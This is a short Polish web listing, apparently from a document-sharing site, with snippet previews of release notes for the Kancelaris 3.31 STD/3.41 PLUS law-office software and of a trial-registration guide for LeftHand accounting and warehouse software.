Bardziej szczegółowoCo nowego w systemie Kancelaris 3.31 STD/3.41 PLUS
Ten dokument zawiera informacje o zmianach w wersjach: 3.31 STD w stosunku do wersji 3.30 STD 3.41 PLUS w stosunku do wersji 3.40 PLUS 1. Kancelaria 1.1. Opcje kancelarii Co nowego w systemie Kancelaris
Bardziej szczegółowoLeftHand Sp. z o. o.
LeftHand Sp. z o. o. Producent oprogramowania finansowo-księgowe, handlowego i magazynowego na Windows i Linux Instrukcja rejestracji wersji testowej programu LeftHand Ten dokument ma na celu przeprowadzić
Bardziej szczegółowo